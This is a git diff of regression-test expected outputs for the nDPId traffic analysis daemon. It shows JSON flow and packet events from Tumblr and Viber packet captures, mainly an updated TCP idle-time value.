+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":1605292105170,"flow_last_seen":1605292122449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":187188,"flow_avg_l4_payload_len":647,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":326,"flow_first_seen":1605292105171,"flow_last_seen":1605292122739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":185805,"flow_avg_l4_payload_len":569,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43602,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00619{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1605292105726,"flow_last_seen":1605292122804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":1371,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1605292122095,"flow_last_seen":1605292122344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3141,"flow_tot_l4_payload_len":39546,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","packets-captured":24745,"packets-processed":24745,"total-skipped-flows":0,"total-l4-data-len":22196494,"total-not-detected-flows":0,"total-guessed-flows":38,"total-detected-flows":14,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":272,"global_ts_msec":1605292122899} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24745/24745 diff --git a/test/results/viber.pcap.out b/test/results/viber.pcap.out index 0c56de73b..43eaed397 100644 --- a/test/results/viber.pcap.out +++ b/test/results/viber.pcap.out 
@@ -1,14 +1,14 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"viber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1527155638428} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638428,"flow_last_seen":1527155638428,"flow_idle_time":7440000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1527155638428,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638428,"flow_last_seen":1527155638428,"flow_idle_time":7560000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1527155638428,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1527155638428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1527155638428,"pkt":"AA6OMNv9MAdNo1+nCABFAACZvbBAAEAGio\/AqAARNAD9ZYG4EJTYH5QATQ0UaIAYAtokAwAAAQEICgAhYEL3kz3SZQAKAAAALtCh9tIA1PL3FQOheV4He+mBM0W\/i9pTb10sHI+OMXtBs1b9JHGGgzJlSCkVK80QeHWJMpbzU2NcxAJaXXoLguc1CK5osKkCx6zZTIH0SZ0piWwLO+YlPXpdR9T6nHw="} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1527155638474,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155638474,"pkt":"AA6OMNv9MAdNo1+nCABFAABAHQZAAEARnDbAqAARwKgAD7KvADUALIZ64YMBAAABAAAAAAAABWdyYXBoCGZhY2Vib29rA2NvbQAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155638474,"flow_last_seen":1527155638474,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155638474,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1527155638476,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1527155638476,"pkt":"MAdNo1+nAA6OMNv9CABFAAC9W3xAAEARXUPAqAAPwKgAEQA1sq8AqYax4YOBgAABAAMAAgACBWdyYXBoCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAK\/QAGA2FwacASwDAABQABAAADcAAMBHN0YXIEYzEwcsASwEIAAQABAAAAIgAEHw1WCMBHAAIAAQAAChUABwFiAm5zwEfARwACAAEAAAoVAAQBYcBswH0AAQABAAAKFQAERavvC8BqAAEAAQAAChUABEWr\/ws="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155638476,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.8"}} -00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} +00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1527155638483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1527155638483,"pkt":"AA6OMNv9MAdNo1+nCABFAABsvbFAAEAGirvAqAARNAD9ZYG4EJTYH5RlTQ0UaIAYAtrUUgAAAQEICgAhYFH3kz3SOAALAAAAldaoLlKjmwog1MjwGSIlPYr6Sdpf8civ07lgAXs3mNLP4I1IauuXnWuqSM\/O114Rmek="} 